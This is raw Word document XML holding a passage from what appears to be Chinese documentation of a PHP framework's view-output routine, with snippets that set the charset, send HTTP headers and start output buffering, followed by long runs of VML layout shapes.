                      <w:ind w:left="579" w:right="48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GLOBALS[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'_viewStartTime'] = microtime(TRUE); if(null===$templateFile)</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="217" w:lineRule="exact"/>
                      <w:ind w:left="9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使用</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-5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null</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:spacing w:val="-74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参数作为模版名直接返回不做任何输出</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="3068"/>
                      </w:tabs>
                      <w:spacing w:before="112" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="579" w:right="2467" w:firstLine="40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  ;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if(empty($charset))</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>$charset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=</w:t>
                    </w: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C(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'DEFAULT_CHARSET');</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="62"/>
                      <w:ind w:left="579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网页字符编码</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112" w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="180" w:right="50" w:firstLine="39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header(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"Content-Type:".$contentType."; </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>charset=".$charset);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:tabs>
                        <w:tab w:val="left" w:pos="4755"/>
                      </w:tabs>
                      <w:spacing w:line="215" w:lineRule="exact"/>
                      <w:ind w:left="579" w:right="50"/>
                      <w:rPr>
                        <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/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header(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"Cache-control:</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333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private");</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:tab/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支持页面回跳</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="50" w:line="338" w:lineRule="auto"/>
                      <w:ind w:left="579" w:right="4825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页面缓存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ob_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start(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44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ob_implicit_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flush(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0);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rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="16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6"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s3998" style="position:absolute;margin-left:80.85pt;margin-top:72.25pt;width:337.25pt;height:572.2pt;z-index:-363208;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1617,1445" coordsize="6745,11444">
            <v:rect id="_x0000_s4200" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4199" style="position:absolute;left:1797;top:1658;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4198" style="position:absolute;left:1897;top:1658;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4197" style="position:absolute;left:1997;top:1658;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4196" style="position:absolute;left:2097;top:1658;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4195" style="position:absolute;left:2197;top:1658;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4194" style="position:absolute;left:2438;top:1658;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4193" style="position:absolute;left:2538;top:1658;width:1000;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4192" style="position:absolute;left:3538;top:1658;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4191" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4190" type="#_x0000_t75" style="position:absolute;left:1797;top:2014;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4189" style="position:absolute;left:2197;top:2014;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4188" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4187" style="position:absolute;left:1797;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4186" style="position:absolute;left:1897;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4185" style="position:absolute;left:1997;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4184" style="position:absolute;left:2097;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4183" style="position:absolute;left:2197;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4182" style="position:absolute;left:2297;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4181" style="position:absolute;left:2397;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4180" style="position:absolute;left:2497;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4179" style="position:absolute;left:2597;top:2340;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4178" style="position:absolute;left:4163;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4177" style="position:absolute;left:4263;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4176" style="position:absolute;left:4363;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4175" style="position:absolute;left:4463;top:2340;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4174" style="position:absolute;left:4584;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4173" style="position:absolute;left:4684;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4172" style="position:absolute;left:4784;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4171" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4170" style="position:absolute;left:1797;top:2666;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4169" style="position:absolute;left:1617;top:2929;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4168" style="position:absolute;left:1797;top:2992;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4167" style="position:absolute;left:1617;top:3255;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4166" style="position:absolute;left:1797;top:3288;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4165" style="position:absolute;left:1897;top:3288;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4164" style="position:absolute;left:1997;top:3288;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4163" style="position:absolute;left:2097;top:3288;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4162" style="position:absolute;left:2197;top:3288;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4161" style="position:absolute;left:2438;top:3288;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4160" style="position:absolute;left:2538;top:3288;width:850;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4159" style="position:absolute;left:3388;top:3288;width:1325;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4158" style="position:absolute;left:1617;top:3581;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4157" type="#_x0000_t75" style="position:absolute;left:1797;top:3644;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4156" style="position:absolute;left:2197;top:3644;width:5904;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4155" style="position:absolute;left:1617;top:3907;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4154" style="position:absolute;left:1797;top:3970;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4153" style="position:absolute;left:5050;top:3970;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4152" style="position:absolute;left:5171;top:3970;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4151" style="position:absolute;left:1617;top:4233;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4150" style="position:absolute;left:1797;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4149" style="position:absolute;left:1897;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4148" style="position:absolute;left:1997;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4147" style="position:absolute;left:2097;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4146" style="position:absolute;left:2197;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4145" style="position:absolute;left:2297;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4144" style="position:absolute;left:2397;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4143" style="position:absolute;left:2497;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4142" style="position:absolute;left:2597;top:4296;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4141" style="position:absolute;left:4163;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4140" style="position:absolute;left:4263;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4139" style="position:absolute;left:4363;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4138" style="position:absolute;left:4463;top:4296;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4137" style="position:absolute;left:4584;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4136" style="position:absolute;left:4684;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4135" style="position:absolute;left:4784;top:4296;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4134" style="position:absolute;left:1617;top:4559;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4133" style="position:absolute;left:1797;top:4622;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4132" style="position:absolute;left:1617;top:4885;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4131" style="position:absolute;left:1797;top:4948;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4130" style="position:absolute;left:1617;top:5211;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4129" style="position:absolute;left:1617;top:5537;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4128" style="position:absolute;left:1797;top:5570;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4127" style="position:absolute;left:1897;top:5570;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4126" style="position:absolute;left:1997;top:5570;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4125" style="position:absolute;left:2097;top:5570;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4124" style="position:absolute;left:2197;top:5570;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4123" style="position:absolute;left:2438;top:5570;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4122" style="position:absolute;left:2538;top:5570;width:1400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4121" style="position:absolute;left:1617;top:5863;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4120" type="#_x0000_t75" style="position:absolute;left:1797;top:5926;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4119" style="position:absolute;left:2197;top:5926;width:4338;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4118" style="position:absolute;left:1617;top:6189;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4117" style="position:absolute;left:1797;top:6222;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4116" style="position:absolute;left:1897;top:6222;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4115" style="position:absolute;left:1997;top:6222;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4114" style="position:absolute;left:2097;top:6222;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4113" style="position:absolute;left:2197;top:6222;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4112" style="position:absolute;left:2438;top:6222;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4111" style="position:absolute;left:2538;top:6222;width:1000;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4110" style="position:absolute;left:1617;top:6515;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4109" type="#_x0000_t75" style="position:absolute;left:1797;top:6578;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4108" style="position:absolute;left:2197;top:6578;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4107" style="position:absolute;left:1617;top:6841;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4106" style="position:absolute;left:1797;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4105" style="position:absolute;left:1897;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4104" style="position:absolute;left:1997;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4103" style="position:absolute;left:2097;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4102" style="position:absolute;left:2197;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4101" style="position:absolute;left:2297;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4100" style="position:absolute;left:2397;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4099" style="position:absolute;left:2497;top:6904;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4098" style="position:absolute;left:1617;top:7167;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4097" style="position:absolute;left:1797;top:7230;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4096" style="position:absolute;left:1617;top:7493;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4095" style="position:absolute;left:1797;top:7556;width:1566;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4094" style="position:absolute;left:1617;top:7819;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4093" type="#_x0000_t75" style="position:absolute;left:1797;top:7882;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4092" style="position:absolute;left:1617;top:8145;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4091" type="#_x0000_t75" style="position:absolute;left:1797;top:8178;width:641;height:259">
              <v:imagedata r:id="rId96" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4090" style="position:absolute;left:2438;top:8178;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4089" style="position:absolute;left:1617;top:8471;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4088" type="#_x0000_t75" style="position:absolute;left:1797;top:8534;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4087" style="position:absolute;left:2197;top:8534;width:2169;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4086" style="position:absolute;left:4366;top:8534;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4085" style="position:absolute;left:4466;top:8534;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4084" style="position:absolute;left:4566;top:8534;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4083" style="position:absolute;left:4686;top:8534;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4082" style="position:absolute;left:4786;top:8534;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4081" style="position:absolute;left:4886;top:8534;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4080" style="position:absolute;left:1617;top:8797;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4079" style="position:absolute;left:1797;top:8860;width:6266;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4078" style="position:absolute;left:1617;top:9123;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4077" style="position:absolute;left:1797;top:9186;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4076" style="position:absolute;left:1617;top:9449;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4075" type="#_x0000_t75" style="position:absolute;left:1797;top:9482;width:641;height:259">
              <v:imagedata r:id="rId82" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4074" style="position:absolute;left:2438;top:9482;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4073" style="position:absolute;left:1617;top:9775;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4072" type="#_x0000_t75" style="position:absolute;left:1797;top:9838;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4071" style="position:absolute;left:2197;top:9838;width:2048;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4070" style="position:absolute;left:4245;top:9838;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4069" style="position:absolute;left:4366;top:9838;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4068" style="position:absolute;left:4607;top:9838;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4067" style="position:absolute;left:1617;top:10101;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4066" style="position:absolute;left:1797;top:10164;width:3856;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4065" style="position:absolute;left:5653;top:10164;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4064" style="position:absolute;left:5773;top:10164;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4063" style="position:absolute;left:1617;top:10427;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s4062" type="#_x0000_t75" style="position:absolute;left:1797;top:10460;width:400;height:259">
              <v:imagedata r:id="rId95" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s4061" style="position:absolute;left:2197;top:10460;width:1325;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4060" style="position:absolute;left:3522;top:10460;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4059" style="position:absolute;left:3643;top:10460;width:723;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4058" style="position:absolute;left:4366;top:10460;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4057" style="position:absolute;left:4466;top:10460;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4056" style="position:absolute;left:4566;top:10460;width:400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4055" style="position:absolute;left:1617;top:10753;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4054" style="position:absolute;left:1797;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4053" style="position:absolute;left:1897;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4052" style="position:absolute;left:1997;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4051" style="position:absolute;left:2097;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4050" style="position:absolute;left:2197;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4049" style="position:absolute;left:2297;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4048" style="position:absolute;left:2397;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4047" style="position:absolute;left:2497;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4046" style="position:absolute;left:2597;top:10816;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4045" style="position:absolute;left:4284;top:10816;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4044" style="position:absolute;left:4404;top:10816;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4043" style="position:absolute;left:6332;top:10816;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4042" style="position:absolute;left:6453;top:10816;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4041" style="position:absolute;left:1617;top:11079;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4040" style="position:absolute;left:1797;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4039" style="position:absolute;left:1897;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4038" style="position:absolute;left:1997;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4037" style="position:absolute;left:2097;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4036" style="position:absolute;left:2197;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4035" style="position:absolute;left:2297;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4034" style="position:absolute;left:2397;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4033" style="position:absolute;left:2497;top:11142;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4032" style="position:absolute;left:2597;top:11142;width:2651;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4031" style="position:absolute;left:1617;top:11405;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4030" style="position:absolute;left:1797;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4029" style="position:absolute;left:1897;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4028" style="position:absolute;left:1997;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4027" style="position:absolute;left:2097;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4026" style="position:absolute;left:2197;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4025" style="position:absolute;left:2297;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4024" style="position:absolute;left:2397;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4023" style="position:absolute;left:2497;top:11438;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4022" style="position:absolute;left:2597;top:11438;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4021" style="position:absolute;left:2838;top:11438;width:1600;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4020" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4019" style="position:absolute;left:1797;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4018" style="position:absolute;left:1897;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4017" style="position:absolute;left:1997;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4016" style="position:absolute;left:2097;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4015" style="position:absolute;left:2197;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4014" style="position:absolute;left:2297;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4013" style="position:absolute;left:2397;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4012" style="position:absolute;left:2497;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4011" style="position:absolute;left:2597;top:11794;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4010" style="position:absolute;left:3440;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4009" style="position:absolute;left:3561;top:11794;width:2289;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4008" style="position:absolute;left:5850;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4007" style="position:absolute;left:5971;top:11794;width:1205;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s4006" style="position:absolute;left:7176;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
